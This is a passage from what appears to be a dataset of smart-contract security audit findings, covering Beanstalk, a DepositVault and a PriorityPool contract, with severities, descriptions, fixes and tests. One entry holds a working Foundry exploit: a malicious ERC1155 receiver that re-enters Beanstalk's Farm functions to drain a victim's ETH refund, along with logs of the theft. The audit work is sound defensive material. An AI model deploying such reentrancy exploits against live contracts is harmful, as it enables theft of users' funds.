In this case, the attacker could be the recipient of Beanstalk Fertilizer, for example, given this is a likely candidate for an action that may be performed via `FarmFacet` functions, utilizing `TokenSupportFacet::transferERC1155`, and because transfers of these tokens are performed ""safely"" by calling `Fertilizer1155::__doSafeTransferAcceptanceCheck` which in turn calls the `IERC1155ReceiverUpgradeable::onERC1155Received` hook on the Fertilizer recipient.\\nContinuing the above example, a malicious recipient could call back into the `FarmFacet` and re-enter the Farm functions via the `Fertilizer1155` safe transfer acceptance check with empty calldata and only `1 wei` of payable value. This causes the execution of the attacker's transaction to fall straight through to the refund logic, given no loop iterations occur on the empty data and the conditional blocks within the modifier are entered due to the (ever so slightly) non-zero `msg.value`. The call to `LibEth::refundEth` will succeed since `s.isFarm == 1` in the attacker's context, sending the entire Diamond proxy balance. When execution continues in the context of the original caller's Farm call, it will still enter the conditional since their `msg.value` was also non-zero; however, there is no longer any ETH balance to refund, so this call will fall through without sending any value as the conditional block is not entered.",Add a reentrancy guard to `FarmFacet` Farm functions.\\n\\clearpage,"A malicious external contract handed control of execution during the lifetime of a Farm call can reenter and steal intermediate user funds. 
As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of a Fertilizer recipient, for example, to re-enter Beanstalk, draining funds remaining in the Diamond that should have been refunded to the original caller at the end of execution:\\n```\\ncontract FertilizerRecipient {\\n bool exploited;\\n\\n function onERC1155Received(address, address, uint256, uint256, bytes calldata) external returns (bytes4) {\\n console.log(""entered exploiter onERC1155Received"");\\n if (!exploited) {\\n exploited = true;\\n console.log(""exploiting farm facet farm call"");\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](0);\\n IBeanstalk(BEANSTALK).advancedFarm{value: 1 wei}(data);\\n console.log(""finished exploiting farm facet farm call"");\\n }\\n return bytes4(0xf23a6e61);\\n }\\n\\n fallback() external payable {\\n console.log(""entered exploiter fallback"");\\n console.log(""Beanstalk balance: "", BEANSTALK.balance);\\n console.log(""Exploiter balance: "", address(this).balance);\\n }\\n}\\n\\ncontract FarmFacetPoC is Test {\\n uint256 constant TOKEN_ID = 3445713;\\n address constant VICTIM = address(0x995D1e4e2807Ef2A8d7614B607A89be096313916);\\n FertilizerRecipient exploiter;\\n\\n function setUp() public {\\n vm.createSelectFork(""mainnet"", ATTACK_BLOCK);\\n\\n FarmFacet farmFacet = new FarmFacet();\\n vm.etch(FARM_FACET, address(farmFacet).code);\\n\\n Fertilizer fert = new Fertilizer();\\n vm.etch(FERTILIZER, address(fert).code);\\n\\n assertGe(IERC1155(FERTILIZER).balanceOf(VICTIM, TOKEN_ID), 1, ""Victim does not have token"");\\n\\n exploiter = new FertilizerRecipient();\\n vm.deal(address(exploiter), 1 wei);\\n\\n vm.label(VICTIM, ""VICTIM"");\\n vm.deal(VICTIM, 10 ether);\\n\\n vm.label(BEANSTALK, ""Beanstalk Diamond"");\\n vm.label(FERTILIZER, ""Fertilizer"");\\n vm.label(address(exploiter), ""Exploiter"");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(""VICTIM 
balance before: "", VICTIM.balance);\\n emit log_named_uint(""BEANSTALK balance before: "", BEANSTALK.balance);\\n emit log_named_uint(""Exploiter balance before: "", address(exploiter).balance);\\n\\n vm.startPrank(VICTIM);\\n // approve Beanstalk to transfer Fertilizer\\n IERC1155(FERTILIZER).setApprovalForAll(BEANSTALK, true);\\n\\n // encode call to `TokenSupportFacet::transferERC1155`\\n bytes4 selector = 0x0a7e880c;\\n assertEq(IBeanstalk(BEANSTALK).facetAddress(selector), address(0x5e15667Bf3EEeE15889F7A2D1BB423490afCb527), ""Incorrect facet address/invalid function"");\\n\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](1);\\n data[0] = AdvancedFarmCall(abi.encodeWithSelector(selector, address(FERTILIZER), address(exploiter), TOKEN_ID, 1), abi.encodePacked(bytes1(0x00)));\\n IBeanstalk(BEANSTALK).advancedFarm{value: 10 ether}(data);\\n vm.stopPrank();\\n\\n emit log_named_uint(""VICTIM balance after: "", VICTIM.balance);\\n emit log_named_uint(""BEANSTALK balance after: "", BEANSTALK.balance);\\n emit log_named_uint(""Exploiter balance after: "", address(exploiter).balance);\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to steal the excess 10 Ether sent by the victim:\\n```\\nRunning 1 test for test/FarmFacetPoC.t.sol:FarmFacetPoC\\n[PASS] test_attack() (gas: 183060)\\nLogs:\\n VICTIM balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n Exploiter balance before: : 1\\n data.length: 1\\n entered __doSafeTransferAcceptanceCheck\\n to is contract, calling hook\\n entered exploiter onERC1155Received\\n exploiting farm facet farm call\\n data.length: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Exploiter balance: 10000000000000000001\\n finished exploiting farm facet farm call\\n VICTIM balance after: : 0\\n BEANSTALK balance after: : 0\\n Exploiter balance after: : 10000000000000000001\\n```\\n",```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of 
the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n +Duplicate fees will be paid by `LibTransfer::transferFee` when transferring fee-on-transfer tokens with `EXTERNAL_INTERNAL` 'from' mode and `EXTERNAL` 'to' mode,medium,"Beanstalk utilizes an internal virtual balance system that significantly reduces transaction fees when using tokens that are intended to remain within the protocol. `LibTransfer` achieves this by managing every transfer between accounts, considering both the origin 'from' and destination 'to' modes of the in-flight funds. As a result, there are four types of transfers based on the source of the funds (from mode):\\nEXTERNAL: The sender will not use their internal balances for the operation.\\nINTERNAL: The sender will use their internal balances for the operation.\\nEXTERNAL_INTERNAL: The sender will attempt to utilize their internal balance to transfer all desired funds. If funds remain to be sent, their externally owned funds will be utilized to cover the difference.\\nINTERNAL_TOLERANT: The sender will utilize their internal balances for the operation. With insufficient internal balance, the operation will continue (without reverting) with this reduced amount. 
It is, therefore, imperative to always check the return value of LibTransfer functions to continue the execution of calling functions with the true utilized amount, especially in this internal tolerant case.\\nThe current implementation of `LibTransfer::transferToken` for `(from mode: EXTERNAL ; to mode: EXTERNAL)` ensures a safe transfer operation from the sender to the recipient:\\n```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n\\nPerforming this operation allows duplication of fee-on-transfer token fees to be avoided if funds are first transferred to the contract and then to the recipient; however, `LibTransfer::transferToken` balance will incur double the fee if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` when the internal balance is insufficient cover the full transfer amount, given that:\\nThe remaining token balance would first be transferred to the Beanstalk Diamond, incurring fees.\\nThe remaining token balance would then be transferred to the recipient, incurring fees again.","Add an internal function `LibTransfer::handleFromExternalInternalToExternalTransfer` to handle this case to avoid duplication of fees. 
For instance:\\n```\\nfunction handleFromExternalInternalToExternalTransfer(\\n IERC20 token,\\n address sender,\\n address recipient,\\n address amount\\n) internal {\\n uint256 amountFromInternal = LibBalance.decreaseInternalBalance(\\n sender,\\n token,\\n amount,\\n true // allowPartial to avoid revert\\n );\\n uint256 pendingAmount = amount - amountFromInternal;\\n if (pendingAmount != 0) {\\n token.safeTransferFrom(sender, recipient, pendingAmount);\\n }\\n token.safeTransfer(sender, amountFromInternal);\\n}\\n```\\n\\nThen consider the use of this new function in LibTransfer::transferToken:\\n```\\n function transferToken(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount,\\n From fromMode,\\n To toMode\\n ) internal returns (uint256 transferredAmount) {\\n// Remove the line below\\n if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n// Add the line below\\n if (toMode == To.EXTERNAL) {\\n// Add the line below\\n if (fromMode == From.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n// Add the line below\\n } else if (fromMode == From.EXTERNAL_INTERNAL) {\\n// Add the line below\\n handleFromExternalInternalToExternalTransfer(token, sender, recipient, amount);\\n// Add the line below\\n return amount;\\n// Add the line below\\n }\\n }\\n amount = receiveToken(token, amount, sender, fromMode);\\n sendToken(token, amount, recipient, toMode);\\n return amount;\\n }\\n```\\n","`LibTransfer::transferToken` will incur duplicate fees if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` with fee-on-transfer tokens if the internal balance is not sufficient to cover the full transfer amount.\\nEven though Beanstalk currently does not impose any fees on token transfers, USDT is associated with the protocol, and its contract has already introduced logic to implement a fee on 
token transfer mechanism if ever desired in the future. Considering that the duplication of fees implies a loss of funds, but also taking into account the low likelihood of this issue occurring, the severity assigned to this issue is MEDIUM.","```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n" +"Flood mechanism is susceptible to DoS attacks by a frontrunner, breaking re-peg mechanism when BEAN is above 1 USD",medium,"A call to the BEAN/3CRV Metapool is made within `Weather::sop`, swapping Beans for 3CRV, to aid in returning Beanstalk to peg via a mechanism known as ""Flood"" (formerly Season of Plenty, or sop) when the Beanstalk Farm has been ""Oversaturated"" ($P > 1$; $Pod Rate < 5%$) for more than one Season and for each additional Season in which it continues to be Oversaturated. 
This is achieved by minting additional Beans and selling them directly on Curve, distributing the proceeds from the sale as 3CRV to Stalkholders.\\nUnlike `Oracle::stepOracle`, which returns the aggregate time-weighted `deltaB` value across both the BEAN/3CRV Metapool and BEAN/ETH Well, the current shortage/excess of Beans during the handling of Rain in `Weather::stepWeather` are calculated directly from the Curve Metapool via `LibBeanMetaCurve::getDeltaB`.\\n```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n\\nThis introduces the possibility that a long-tail MEV bot could perform a denial-of-service attack on the Flood mechanism by performing a sandwich attack on `SeasonFacet::gm` whenever the conditions are met such that `Weather::sop` is called. The attacker would first front-run the transaction by selling BEAN for 3CRV, bringing the price of BEAN back to peg, which could result in `newBeans <= 0`, thus bypassing the subsequent logic, and then back-running to repurchase their sold BEAN effectively maintaining the price of BEAN above peg.\\nThe cost for performing this attack is 0.08% of the utilized funds. However, not accounting for other mechanisms (such as Convert) designed to return the price of Bean to peg, Beanstalk would need to wait the Season duration of 1 hour before making another effective `SeasonFacet::gm`, provided that the previous transaction did not revert. In the subsequent call, the attacker can replicate this action at the same cost, and it is possible that the price of BEAN may have increased further during this hour.","Consider the use of an oracle to determine how many new Beans should be minted and sold for 3CRV. 
This implies the following modification:\\n```\\n function sop() private {\\n// Remove the line below\\n int256 newBeans = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n int256 currentDeltaB = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n (int256 deltaBFromOracle,) = // Remove the line below\\n LibCurveMinting.twaDeltaB();\\n// Add the line below\\n // newBeans = max(currentDeltaB, deltaBFromOracle)\\n// Add the line below\\n newBeans = currentDeltaB > deltaBFromOracle ? currentDeltaB : deltaBFromOracle;\\n\\n if (newBeans <= 0) return;\\n\\n uint256 sopBeans = uint256(newBeans);\\n uint256 newHarvestable;\\n\\n // Pay off remaining Pods if any exist.\\n if (s.f.harvestable < s.r.pods) {\\n newHarvestable = s.r.pods // Remove the line below\\n s.f.harvestable;\\n s.f.harvestable = s.f.harvestable.add(newHarvestable);\\n C.bean().mint(address(this), newHarvestable.add(sopBeans));\\n } else {\\n C.bean().mint(address(this), sopBeans);\\n }\\n\\n // Swap Beans for 3CRV.\\n uint256 amountOut = C.curveMetapool().exchange(0, 1, sopBeans, 0);\\n\\n rewardSop(amountOut);\\n emit SeasonOfPlenty(s.season.current, amountOut, newHarvestable);\\n }\\n```\\n\\nThe motivation for using the maximum value between the current `deltaB` and that calculated from time-weighted average balances is that the action of an attacker increasing `deltaB` to carry out a sandwich attack would be nonsensical as excess Bean minted by the Flood mechanism would be sold for additional 3CRV. In this way, anyone attempting to increase `deltaB` would essentially be giving away their 3CRV LP tokens to Stalkholders. Therefore, by using the maximum `deltaB`, it is ensured that the impact of any attempt to execute the attack described above would be minimal and economically unattractive. 
If no one attempts the attack, the behavior will remain as originally intended.\\n\\clearpage",Attempts by Beanstalk to restore peg via the Flood mechanism are susceptible to denial-of-service attacks by a sufficiently well-funded sandwich attacker through frontrunning of `SeasonFacet::gm`.,"```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n" +"Spender can front-run calls to modify token allowances, resulting in DoS and/or spending more than was intended",low,"When updating the allowance for a spender that is less than the value currently set, a well-known race condition allows the spender to spend more than the caller intended by front-running the transaction that performs this update. Due to the nature of the `ERC20::approve` implementation and other variants used within the Beanstalk system, which update the mapping in storage corresponding to the given allowance, the spender can spend both the existing allowance plus any 'additional' allowance set by the in-flight transaction.\\nFor example, consider the scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending his 100 token allowance.\\nAlice's transaction executes, and Bob's allowance is updated to 50.\\nBob can now spend an additional 50 tokens, resulting in a total of 150 rather than the maximum of 50 as intended by Alice.\\nSpecific functions named `decreaseTokenAllowance`, intended to decrease approvals for a token spender, have been introduced to both the `TokenFacet` and the `ApprovalFacet`. 
`PodTransfer::decrementAllowancePods` similarly exists for the Pod Marketplace.\\nThe issue, however, with these functions is that they are still susceptible to front-running in the sense that a malicious spender could force their execution to revert, violating the intention of the caller to decrease their allowance as they continue to spend that which is currently set. Rather than simply setting the allowance to zero if the caller passes an amount to subtract that is larger than the current allowance, these functions halt execution and revert. This is due to the following line of shared logic:\\n```\\nrequire(\\n currentAllowance >= subtractedValue,\\n ""Silo: decreased allowance below zero""\\n);\\n```\\n\\nConsider the following scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending 60 of his 100 token allowance.\\nAlice's transaction executes, but reverts given Bob's allowance is now 40.\\nBob can now spend the remaining 40 tokens, resulting in a total of 100 rather than the decreased amount of 50 as intended by Alice.\\nOf course, in this scenario, Bob could have just as easily front-run Alice's transaction and spent his entire existing allowance; however, the fact that he is able to perform a denial-of-service attack results in a degraded user experience. 
Similar to setting maximum approvals, these functions should handle maximum approval revocations to mitigate against this issue.",Set the allowance to zero if the intended subtracted value exceeds the current allowance.\\n\\clearpage,"Requiring that the intended subtracted allowance does not exceed the current allowance results in a degraded user experience and, more significantly, their loss of funds due to a different route to the same approval front-running attack vector.","```\\nrequire(\\n currentAllowance >= subtractedValue,\\n ""Silo: decreased allowance below zero""\\n);\\n```\\n" +Non-standard ERC20 tokens are not supported,medium,"The protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L49, we can see that the protocol assumes `amount` of tokens were transferred. But this does not hold true for some non-standard ERC20 tokens like fee-on-transfer tokens or rebalancing tokens. 
(Refer to here about the non-standard weird ERC20 tokens)\\nFor example, if token incurs fee on transfer, the actually transferred `amount` will be less than the provided parameter `amount` and the `deposits` will have a wrong state value. Because the current implementation only allows full withdrawal, this means the tokens will be locked in the contract permanently.","We recommend adding another field in the `Deposit` structure, say `balance`\\nWe recommend allow users to withdraw partially and decrease the `balance` field appropriately for successful withdrawals. If these changes are going to be made, we note that there are other parts that need changes. For example, the withdraw function would need to be updated so that it does not require the withdrawal amount is same to the original deposit amount.","If non-standard ERC20 tokens are used, the tokens could be locked in the contract permanently.","```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n" +The deposit function is not following CEI pattern,low,"The protocol implemented a function `deposit()` to allow users to 
deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L47, we can see that the token transfer happens before updating the accounting state of the protocol against the CEI pattern. Because the protocol intends to support all ERC20 tokens, the tokens with hooks (e.g. ERC777) can be exploited for reentrancy. 
Although we can not verify an exploit that causes explicit loss due to this, it is still highly recommended to follow CEI pattern to prevent possible reentrancy attack.",Handle token transfers after updating the `deposits` state.,,"```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, ""Deposit amount must be greater than 0"");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), ""Token address must be 0x0 for ETH deposits"");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), ""Token address must not be 0x0 for token deposits"");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n" +Nonstandard usage of nonce,low,"The protocol implemented two withdraw functions `withdrawDeposit()` and `withdraw()`. While the function `withdrawDeposit()` is designed to be used by the depositor themselves, the function `withdraw()` is designed to be used by anyone who has a signature from the depositor. 
The function `withdraw()` has a parameter `nonce` but the usage of this param is not aligned with the general meaning of `nonce`.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n\\nIn common usage, `nonce` is used to track the latest transaction from the EOA and generally it is increased on the user's transaction. It can be effectively used to invalidate the previous signature by the signer. But looking at the current implementation, the parameter `nonce` is merely used as an index to refer the `deposit` at a specific index.\\nThis is a bad naming and can confuse the users.","If the protocol intended to provide a kind of invalidation mechanism using the nonce, there should be a separate mapping that stores the nonce for each user. The current nonce can be used to generate a signature and a depositor should be able to increase the nonce to invalidate the previous signatures. Also the nonce would need to be increased on every successful call to `withdraw()` to prevent replay attack. 
Please note that with this remediation, the mapping `usedWithdrawalHashes` can be removed completely because the hash will be always decided using the latest nonce and the nonce will be invalidated automatically (because it increases on successful call).\\nIf this is not what the protocol intended, the parameter nonce can be renamed to `depositIndex` as implemented in the function `withdrawDeposit()`.",,"```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n" +Unnecessary parameter amount in withdraw function,low,"The function `withdraw()` has a parameter `amount` but we don't understand the necessity of this parameter. At line L67, the `amount` is required to be the same to the whole deposit `amount`. 
This means the user does not have the flexibility to choose the withdraw `amount`, which in effect means the parameter is not necessary at all.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n","If the protocol intends to only allow full withdrawal, this parameter can be removed completely (that will help save gas as well). 
Unnecessary parameters increase the complexity of the function and make it more error prone.",,"```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, ""Invalid deposit index"");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, ""Invalid signature"");\\n require(!usedWithdrawalHashes[withdrawalHash], ""Withdrawal has already been executed"");\\n require(amount == depositToWithdraw.amount, ""Withdrawal amount must match deposit amount"");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n" +Functions not used internally could be marked external,low,"Using proper visibility modifiers is a good practice to prevent unintended access to functions. 
Furthermore, marking functions as `external` instead of `public` can save gas.\\n```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n",Consider changing the visibility modifier to `external` for the functions that are not used internally.,,"```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n" +User's funds are locked temporarily in the PriorityPool contract,medium,"The protocol intended to utilize the deposit queue for withdrawal to minimize the stake/unstake interaction with the staking pool. When a user wants to withdraw, they are supposed to call the function `PriorityPool::withdraw()` with the desired amount as a parameter.\\n```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n\\nAs we can see in the implementation, the protocol pulls the `_amount` of LSD tokens from the user first and then calls `_withdraw()` where the actual withdrawal utilizing the queue is processed.\\n```\\nfunction _withdraw(address _account, uint256 _amount) internal {\\n if (poolStatus == PoolStatus.CLOSED) revert WithdrawalsDisabled();\\n\\n uint256 toWithdrawFromQueue = _amount <= totalQueued ? 
_amount : totalQueued;//@audit-info if the queue is not empty, we use that first\\n uint256 toWithdrawFromPool = _amount - toWithdrawFromQueue;\\n\\n if (toWithdrawFromQueue != 0) {\\n totalQueued -= toWithdrawFromQueue;\\n depositsSinceLastUpdate += toWithdrawFromQueue;//@audit-info regard this as a deposit via the queue\\n }\\n\\n if (toWithdrawFromPool != 0) {\\n stakingPool.withdraw(address(this), address(this), toWithdrawFromPool);//@audit-info withdraw from pool into this contract\\n }\\n\\n //@audit-warning at this point, toWithdrawFromQueue of LSD tokens remain in this contract!\\n\\n token.safeTransfer(_account, _amount);//@audit-info\\n emit Withdraw(_account, toWithdrawFromPool, toWithdrawFromQueue);\\n}\\n```\\n\\nBut looking in the function `_withdraw()`, only `toWithdrawFromPool` amount of LSD tokens are withdrawn (burn) from the staking pool and `toWithdrawFromQueue` amount of LSD tokens remain in the `PriorityPool` contract. On the other hand, the contract tracks the queued amount for users by the mapping `accountQueuedTokens` and this leads to possible mismatch in the accounting. Due to this mismatch, a user's LSD tokens can be locked in the `PriorityPool` contract while the user sees his queued amount (getQueuedTokens()) is positive. Users can claim the locked LSD tokens once the function `updateDistribution` is called. Through the communication with the protocol team, it is understood that `updateDistribution` is expected to be called probably every 1-2 days unless there were any new deposits into the staking pool. 
So it means user's funds can be locked temporarily in the contract which is unfair for the user.",Consider add a feature to allow users to withdraw LSD tokens from the contract directly.,"User's LSD tokens can be locked temporarily in the PriorityPool contract\\nProof of Concept:\\n```\\n it('Cyfrin: user funds can be locked temporarily', async () => {\\n // try deposit 1500 while the capacity is 1000\\n await strategy.setMaxDeposits(toEther(1000))\\n await sq.connect(signers[1]).deposit(toEther(1500), true)\\n\\n // 500 ether is queued for accounts[1]\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 1000)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 8500)\\n assert.equal(fromEther(await sq.totalQueued()), 500)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 0)\\n\\n // at this point user calls withdraw (maybe by mistake?)\\n // withdraw swipes from the queue and the deposit room stays at zero\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n\\n // at this point getQueueTokens[accounts[1]] does not change but the queue is empty\\n // user will think his queue position did not change and he can simply unqueue\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 500)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9000)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n // NOTE: at this point 500 ethers of LSD tokens are locked in the queue contract\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // but 